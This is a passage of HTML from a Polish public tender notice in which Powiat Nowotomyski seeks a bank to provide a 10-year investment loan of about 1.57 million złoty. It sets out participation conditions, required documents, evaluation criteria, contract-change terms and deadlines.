<b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2027-12-28</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Warunek ten będzie spełniony przez Wykonawcę, jeżeli wykaże, że posiada aktualne zezwolenie na prowadzenie działalności bankowej na terenie Rzeczpospolitej Polskiej, jak również na realizację usług objętych przedmiotem zamówienia, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997r. Prawo bankowe (Dz. U. z 2016r. poz. 1988 ze zmianami), a w przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe, inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w art. 193 ustawy Prawo bankowe.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa żadnych warunków w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie określa żadnych warunków w tym zakresie.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 6.2 ppkt 1) - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1) aktualne zezwolenie na prowadzenie działalności bankowej na terenie Rzeczpospolitej Polskiej, jak również na realizację usług objętych przedmiotem zamówienia, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997r. Prawo bankowe (Dz. U. z 2016r. poz. 1988 ze zmianami), a w przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe, inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w art. 193 ustawy Prawo bankowe</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">a) wypełniony formularz ofertowy sporządzony z wykorzystaniem wzoru stanowiącego Załącznik nr 1 do SIWZ ;b) oświadczenie wymienione w pkt 6.1 niniejszej SIWZ;c) harmonogram spłaty kredytu,d) projekt umowy,e) oryginał pełnomocnictwa lub kopia poświadczona notarialnie pełnomocnictwa (jeżeli wykonawcę reprezentuje i ofertę składa pełnomocnik).f) Wykonawcy występujący wspólnie muszą, zgodnie z zapisami art. 23 ust. 2 ustawy Prawo zamówień publicznych ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarciu umowy o udzielenie przedmiotowego zamówienia publicznego. Do oferty należy dołączyć pełnomocnictwo, które powinno dokładnie określać zakres umocowania,g) Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Wzór oświadczenia stanowi załącznik nr 3 do specyfikacji. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>95,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>czas uruchomienia kredytu</TD><TD style='border: 1px solid black;border-collapse: collapse;'>5,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja wieloetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"></span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">W wyniku przeprowadzonego postępowania zostanie zawarta umowa wg wzoru obowiązującego w banku Wykonawcy, który złoży najkorzystniejszą ofertę.Do złożonej oferty Wykonawca załączy projekt umowy o udzielenie kredytu spełniający wymienione w SIWZ wymagania.</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający zgodnie z art. 144 ustawy Pzp przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru.Wszelkie zmiany j Umowy wymagają formy pisemnej pod rygorem nieważności, z wyjątkiem zmiany oprocentowania. W przypadku zmiany wysokości oprocentowania kredytu Bank każdorazowo zawiadomi Zamawiającego w formie pisemnej w terminie siedmiu dni od dokonania zmiany wysokości oprocentowania, podając wysokość oraz sposób wyliczenia oprocentowania na następny okres odsetkowy. Zmiana wysokości oprocentowania nie stanowi zmiany warunków Umowy.Zmiana warunków umowy może nastąpić w następującym zakresie:1)	zmiany strony Umowy tj. następstwa prawnego wynikającego z odrębnych przepisów oraz zmiany nazwy, adresu lub siedziby Banku bądź Zamawiającego,2)	zmiany kwot oraz terminów spłaty rat kapitałowych oraz odsetek nie powodujące przekroczenia okresu kredytowania,3)	obniżenia marży (np. na wniosek Kredytobiorcy do poziomu oferowanego dla nowych kredytów udzielanych jednostkom samorządu terytorialnego)Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień zawartej Umowy określonych powyżej w następujących przypadkach (bez pobierania dodatkowych opłat i prowizji ze strony Banku):1)	wcześniejszej spłaty kredytu,2)	niewykorzystania kredytu w pełnej wysokości, pogorszenia sytuacji ekonomiczno- finansowej,3)	zmiany obowiązujących przepisów, jeśli zgodnie z nimi konieczne będzie dostosowanie treści Umowy do aktualnego stanu prawnego lub które będą miały wpływ na realizację Umowy,4)	wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy.Dla zadania nr 1 Zamawiający dopuszcza możliwość zmniejszenia wysokości udzielonego kredytu bez ponoszenia dodatkowych prowizji i opłat bez konieczności uzyskiwania zgody banku w zależności od wyniku postępowania przetargowego na inwestycje Powiatu finansowane z kredytu.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-06-09</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">08:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>ZADANIE NR 1</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiotem zamówienia jest udzielenie i obsługa długoterminowego kredytu inwestycyjnego złotowego dla Powiatu Nowotomyskiego w wysokości 1.568.439,00zł na okres 10 lat z przeznaczeniem na inwestycje Powiatu Nowotomyskiego na podstawie Uchwały Nr XXVII/188/2017 Rady Powiatu Nowotomyskiego z dnia 15 lutego 2017r.2.	Kredyt w walucie polskiej.3.	Oprocentowanie zmienne, oparte na stawce WIBOR1M + stała marża bankowa ( Zamawiający zastrzega możliwość zmiany marży Banku poprzez jej obniżenie na wniosek Zamawiającego do poziomu oferowanego dla nowych kredytów udzielanych jednostkom samorządu terytorialnego).4.	Okres spłaty- od stycznia 2018 roku do 28 grudnia 2027 roku w okresach miesięcznych.5.	Wykonawca zobowiązany jest stawić do dyspozycji Zamawiającego kredyt w formie przelewu środków finansowych z rachunku kredytowego Wykonawcy na rachunek budżetu Powiatu nr 34 1020 4144 0000 6902 0007 0086. ( w formie polecenia przelewu).6.	Wykorzystanie kredytu nastąpi jednorazowo lub w ratach na podstawie dyspozycji Zamawiającego.7.	Kwota kredytu zostanie postawiona do dyspozycji Zamawiającego w okresie od 01 lipca 2017 roku do 31 grudnia 2017 w wysokości określonej na podstawie dyspozycji Zamawiającego ( w przypadku, gdy procedura przetargowa nie zostanie zakończona do 01.07.2017r., termin postawienia kredytu do dyspozycji ulegnie przesunięciu). 8.	Zamawiający zobowiązuje się do spłaty kapitału i odsetek w następującej formie:a)	Początek spłaty kapitału od 